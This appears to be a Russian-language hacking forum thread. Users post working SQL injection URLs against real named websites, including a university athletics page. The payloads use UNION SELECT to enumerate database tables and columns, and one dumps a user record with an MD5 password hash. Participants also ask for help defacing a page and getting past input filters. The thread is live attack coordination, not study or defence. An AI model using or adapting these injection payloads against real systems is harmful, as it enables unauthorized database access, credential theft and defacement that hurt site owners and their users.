Code: http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,table_name,4,5+from+information _schema.tables/* что дальше делать не подскажите?
Code: http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat(table_schema,0x3a,table_name),4,5+from+information_schema.columns+where+column_name=0x70617373776F7264+--+ progettocompetence_it:areariservata_utenti Code: http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_schema=0x70726F676574746F636F6D706574656E63655F6974+and+table_name=0x617265617269736572766174615F7574656E7469+limit+1,1+--+ id userid password Code: http://www.progettocompetence.it/sito/sistema/articolo.php?id=-1+union+select+1,2,concat_ws(0x3a,id,userid,password),4,5+from+progettocompetence_it.areariservata_utenti+limit+0,1+--+ 1:Ilic:ff112557a3a0a4d1e74f56e0ac979467 Крути limit ....
Code: http://www.mpa-lazio.it/articolo.php?id=-1+union+select+1,2,3,table_name,5,6,7,8+from+information_schema.COLUMNS/* а тут что делать?
а +where+co lumn_name=0x70617373776F7264+--+ откуда? и Code: +where+table_schema=0x70726F676574 746F636F6D706574656E63655F6974+and+table_name=0x61 7265617269736572766174615F7574656E7469+limit+1,1+--+ откуда взяось?
Code: http://terminovo.com/index.php?main_page=products_general_i nfo &products_id=99999999 Фильтруются отдельные символы и буквы, через hex,char ничего не выходит.
Code: http://www.millikin.edu/athletics/archives_sport.asp?SPORT=6%20and%201=1%20UNION+SELECT+1,2,3,NULL+FROM%20INFORMATION_SCHEMA.TABLES%20-- Исключительно в образовательных целях хотелось бы изменить вот эту страничку Code: http://www.millikin.edu/media/print_release.asp?NEWS_ID=1227 имена таблиц похоже только методом тыка.. через ; пробовал менять таблицу news - толку 0...
noneim можно и не методом тыка дальше наверно сам разберешся... на всякий случай прочитай: https://forum.antichat.ru/showthread.php?t=30501
Узнаю через order+by число столбцов,их 4 Code: http://www.4ips.biz/products.php?id=7+order+by+4/* но при запросе +union+select Code: http://www.4ips.biz/products.php?id=7+union+select+1,2,3,4/* The used SELECT statements have a different number of columns Что это значит и что делать?
Это значит, что ты неправильно подобрал количество полей, попробуй подобрать через group by, либо вручную по очереди через union select
Совсем не факт, зачем говорить если не знаешь, эту ситуювину я описывал здесь: http://forum.antichat.ru/showpost.php?p=497033&postcount=21
если ты подобрал кол-во столбцов, но выпадает такая ошибка, то 99% ты имеешь дело с мускулом 3-й версии
Code: http://www.rebellino.it/shop/pag_home/multimedia.php?id=-1+union+select+1,2,user(),version(),5,database()/* [email protected] Sql47718_3 4.0.27-standard-log помогите пожалуйста с таблицами
а разве тогда будет ошибка связанная с кол-вом полей? я думал будет ошибка синтаксиса не могу точно сказать почему именно такая ошибка, но я много раз сталкивался с подобной ситуацией
